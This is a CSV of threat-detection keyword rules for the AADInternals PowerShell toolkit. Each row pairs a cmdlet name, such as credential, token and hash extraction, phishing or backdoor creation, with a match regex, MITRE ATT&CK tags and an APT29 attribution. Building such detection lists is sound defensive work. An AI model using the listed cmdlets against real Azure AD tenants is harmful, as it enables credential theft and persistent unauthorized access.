"*Get-AADIntUserMasterkeys*",".{0,1000}Get\-AADIntUserMasterkeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserMFA*",".{0,1000}Get\-AADIntUserMFA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserMFAApps*",".{0,1000}Get\-AADIntUserMFAApps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserNTHash*",".{0,1000}Get\-AADIntUserNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserPRTKeys*",".{0,1000}Get\-AADIntUserPRTKeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserPRTToken*",".{0,1000}Get\-AADIntUserPRTToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserRealm*",".{0,1000}Get\-AADIntUserRealm.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserRealmExtended*",".{0,1000}Get\-AADIntUserRealmExtended.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserRealmV2*",".{0,1000}Get\-AADIntUserRealmV2.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserRealmV3*",".{0,1000}Get\-AADIntUserRealmV3.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntWindowsCredentialsSyncConfig*",".{0,1000}Get\-AADIntWindowsCredentialsSyncConfig.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-Module AADInternals*",".{0,1000}Get\-Module\sAADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Grant-AADIntAzureUserAccessAdminRole*",".{0,1000}Grant\-AADIntAzureUserAccessAdminRole.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*https://aadinternals.com/aadinternals/*",".{0,1000}https\:\/\/aadinternals\.com\/aadinternals\/.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Import-Module AADInternals*",".{0,1000}Import\-Module\sAADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Install-AADIntForceNTHash*",".{0,1000}Install\-AADIntForceNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Install-Module AADInternals*",".{0,1000}Install\-Module\sAADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Install-Module AADInternals*",".{0,1000}Install\-Module\sAADInternals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntAzureVMScript*",".{0,1000}Invoke\-AADIntAzureVMScript.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntPhishing*",".{0,1000}Invoke\-AADIntPhishing.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntReconAsGuest*",".{0,1000}Invoke\-AADIntReconAsGuest.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntReconAsInsider*",".{0,1000}Invoke\-AADIntReconAsInsider.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntReconAsOutsider*",".{0,1000}Invoke\-AADIntReconAsOutsider.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntSyncAgent*",".{0,1000}Invoke\-AADIntSyncAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntUserEnumerationAsGuest*",".{0,1000}Invoke\-AADIntUserEnumerationAsGuest.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntUserEnumerationAsInsider*",".{0,1000}Invoke\-AADIntUserEnumerationAsInsider.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Invoke-AADIntUserEnumerationAsOutsider*",".{0,1000}Invoke\-AADIntUserEnumerationAsOutsider.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Join-AADIntAzureAD*",".{0,1000}Join\-AADIntAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Join-AADIntDeviceToAzureAD*",".{0,1000}Join\-AADIntDeviceToAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Join-AADIntDeviceToAzureAD.*",".{0,1000}Join\-AADIntDeviceToAzureAD\..{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Join-AADIntDeviceToIntune*",".{0,1000}Join\-AADIntDeviceToIntune.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Join-AADIntLocalDeviceToAzureAD*",".{0,1000}Join\-AADIntLocalDeviceToAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Join-AADIntOnPremDeviceToAzureAD*",".{0,1000}Join\-AADIntOnPremDeviceToAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntADFSRefreshToken*",".{0,1000}New\-AADIntADFSRefreshToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntADFSSelfSignedCertificates*",".{0,1000}New\-AADIntADFSSelfSignedCertificates.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntB2CAuthorizationCode*",".{0,1000}New\-AADIntB2CAuthorizationCode.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntB2CRefreshToken*",".{0,1000}New\-AADIntB2CRefreshToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntBackdoor*",".{0,1000}New\-AADIntBackdoor.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntBulkPRTToken*",".{0,1000}New\-AADIntBulkPRTToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntCertificate*",".{0,1000}New\-AADIntCertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntGuestInvitation*",".{0,1000}New\-AADIntGuestInvitation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntHybridHealthService*",".{0,1000}New\-AADIntHybridHealthService.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntHybridHealthServiceMember*",".{0,1000}New\-AADIntHybridHealthServiceMember.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntHybridHealtServiceEvent*",".{0,1000}New\-AADIntHybridHealtServiceEvent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntInvitationVBA*",".{0,1000}New\-AADIntInvitationVBA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntMOERADomain*",".{0,1000}New\-AADIntMOERADomain.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntMSPartnerDelegatedAdminRequest*",".{0,1000}New\-AADIntMSPartnerDelegatedAdminRequest.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntOneDriveSettings*",".{0,1000}New\-AADIntOneDriveSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntOTP*",".{0,1000}New\-AADIntOTP.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntOTPSecret*",".{0,1000}New\-AADIntOTPSecret.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntP2PDeviceCertificate*",".{0,1000}New\-AADIntP2PDeviceCertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*New-AADIntSAML2Token*",".{0,1000}New\-AADIntSAML2Token.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
